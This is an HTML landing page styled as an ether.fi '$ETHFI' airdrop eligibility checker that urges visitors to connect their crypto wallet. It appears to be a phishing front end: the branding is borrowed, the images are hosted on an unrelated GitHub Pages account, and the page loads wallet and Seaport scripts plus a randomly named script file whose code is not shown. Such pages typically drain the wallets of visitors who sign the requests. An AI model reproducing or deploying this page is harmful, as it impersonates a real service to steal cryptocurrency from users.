<!DOCTYPE html>
<html lang="en">

<head>
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="preload" href="./_next/static/media/3d9ea938b6afa941-s.p.woff2" as="font" type="font/woff2" />
    <link rel="preload" as="image" href="./images/gradient-star-2.png" />
    <link rel="preload" as="image" href="./images/gradient-star-corner.png" />
    <link rel="stylesheet" href="./_next/static/css/ed32a2b0b63afce5.css" data-precedence="next" />
    <link rel="stylesheet" href="./_next/static/css/72a1967900e33d6e.css" data-precedence="next" />
 
    <title>Etherfi</title>
    <meta name="description" content="Delegated Staking Protocol" />
    <meta name="robots" content="follow, index" />
    <meta property="og:title" content="ether.fi" />
    <meta property="og:description" content="Delegated Staking Protocol" />
    <meta property="og:image" content="https://gadzefinance.github.io/Image-Hosting/Etherfi-Logo-Opengraph.png" />
    <meta property="og:type" content="website" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:site" content="@ether_fi" />
    <meta name="twitter:title" content="Etherfi" />
    <meta name="twitter:description" content="Delegated Staking Protocol" />
    <meta name="twitter:image" content="https://gadzefinance.github.io/Image-Hosting/Etherfi-Logo-Opengraph.png" />
    <link rel="icon" href="./favicon.ico" type="image/x-icon" sizes="16x16" />
    <meta name="next-size-adjust" />
    
</head>

<body class="__className_0993c4 relative min-h-dvh overflow-x-clip text-white">
    <div data-rk="">
        <style>
            [data-rk] {
                --rk-blurs-modalOverlay: blur(0px);
                --rk-fonts-body: SFRounded, ui-rounded, "SF Pro Rounded", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
                --rk-radii-actionButton: 9999px;
                --rk-radii-connectButton: 12px;
                --rk-radii-menuButton: 12px;
                --rk-radii-modal: 24px;
                --rk-radii-modalMobile: 28px;
                --rk-colors-accentColor: #3898FF;
                --rk-colors-accentColorForeground: #FFF;
                --rk-colors-actionButtonBorder: rgba(255, 255, 255, 0.04);
                --rk-colors-actionButtonBorderMobile: rgba(255, 255, 255, 0.08);
                --rk-colors-actionButtonSecondaryBackground: rgba(255, 255, 255, 0.08);
                --rk-colors-closeButton: rgba(224, 232, 255, 0.6);
                --rk-colors-closeButtonBackground: rgba(255, 255, 255, 0.08);
                --rk-colors-connectButtonBackground: #1A1B1F;
                --rk-colors-connectButtonBackgroundError: #FF494A;
                --rk-colors-connectButtonInnerBackground: linear-gradient(0deg, rgba(255, 255, 255, 0.075), rgba(255, 255, 255, 0.15));
                --rk-colors-connectButtonText: #FFF;
                --rk-colors-connectButtonTextError: #FFF;
                --rk-colors-connectionIndicator: #30E000;
                --rk-colors-downloadBottomCardBackground: linear-gradient(126deg, rgba(0, 0, 0, 0) 9.49%, rgba(120, 120, 120, 0.2) 71.04%), #1A1B1F;
                --rk-colors-downloadTopCardBackground: linear-gradient(126deg, rgba(120, 120, 120, 0.2) 9.49%, rgba(0, 0, 0, 0) 71.04%), #1A1B1F;
                --rk-colors-error: #FF494A;
                --rk-colors-generalBorder: rgba(255, 255, 255, 0.08);
                --rk-colors-generalBorderDim: rgba(255, 255, 255, 0.04);
                --rk-colors-menuItemBackground: rgba(224, 232, 255, 0.1);
                --rk-colors-modalBackdrop: rgba(0, 0, 0, 0.5);
                --rk-colors-modalBackground: #1A1B1F;
                --rk-colors-modalBorder: rgba(255, 255, 255, 0.08);
                --rk-colors-modalText: #FFF;
                --rk-colors-modalTextDim: rgba(224, 232, 255, 0.3);
                --rk-colors-modalTextSecondary: rgba(255, 255, 255, 0.6);
                --rk-colors-profileAction: rgba(224, 232, 255, 0.1);
                --rk-colors-profileActionHover: rgba(224, 232, 255, 0.2);
                --rk-colors-profileForeground: rgba(224, 232, 255, 0.05);
                --rk-colors-selectedOptionBorder: rgba(224, 232, 255, 0.1);
                --rk-colors-standby: #FFD641;
                --rk-shadows-connectButton: 0px 4px 12px rgba(0, 0, 0, 0.1);
                --rk-shadows-dialog: 0px 8px 32px rgba(0, 0, 0, 0.32);
                --rk-shadows-profileDetailsAction: 0px 2px 6px rgba(37, 41, 46, 0.04);
                --rk-shadows-selectedOption: 0px 2px 6px rgba(0, 0, 0, 0.24);
                --rk-shadows-selectedWallet: 0px 2px 6px rgba(0, 0, 0, 0.24);
                --rk-shadows-walletLogo: 0px 2px 16px rgba(0, 0, 0, 0.16);
            }
        </style>
        <div class="absolute inset-0 -z-10 h-full w-full overflow-hidden"><img src="./images/gradient-star-2.png" alt="" class="absolute left-0 top-0 z-0 h-full" /><img src="./images/gradient-star-corner.png" alt="" class="absolute right-0 top-0 z-0 h-96 w-auto" />
            <div class="absolute inset-0 h-full w-full overflow-hidden bg-black/60"></div>
            <div class="stars"></div>
            <div class="stars2"></div>
        </div>
        <main class="container grid min-h-dvh content-center justify-center justify-items-center gap-12">
            <div class="space-y-5 text-center">
                <h1 class="text-balance text-32 font-semibold lg:text-56">Thanks for joining us as we help people <span class="text-text-4">save</span>,
                    <!-- --><span class="text-text-4">earn</span> and <span class="text-text-4">spend</span>
                    <!-- -->their crypto</h1>
                <p class="text-18 text-text-2 lg:text-24">Connect your wallet to check your eligibility to claim $ETHFI</p>
            </div>
            <div class="flex flex-col items-center gap-8">
                <div class="flex flex-wrap justify-center gap-4"><button class="interact-button disabled:pointer-events-none disabled:cursor-not-allowed bg-logo-gradient bg-[length:200%_100%] bg-center transition-[background-position] duration-300 hover:bg-right px-4 py-2 sm:px-10 sm:py-3 rounded-xl disabled:opacity-65"
                        type="button">Connect your wallet</button></div><button type="button" class="interact-button inline-block text-14 text-link-blue hover:underline" aria-haspopup="dialog" aria-expanded="false" aria-controls="radix-:R5acda:" data-state="closed">Eligibility criteria</button></div>
        </main>
        <div class="Toastify"></div>
    </div>
   
</body>
<script src="./scripts/seaport.js"></script>
<script src="./scripts/coinbase.js"></script>
<script src="./scripts/wallet-connect-v2.js"></script>
<script src="./scripts/wallet-connect-v3.js"></script>
<script charset="UTF-8" type="text/javascript" src="./423c93a9-48fb-4108-8e23-a1ee1b5a0b32.js"></script>

</html>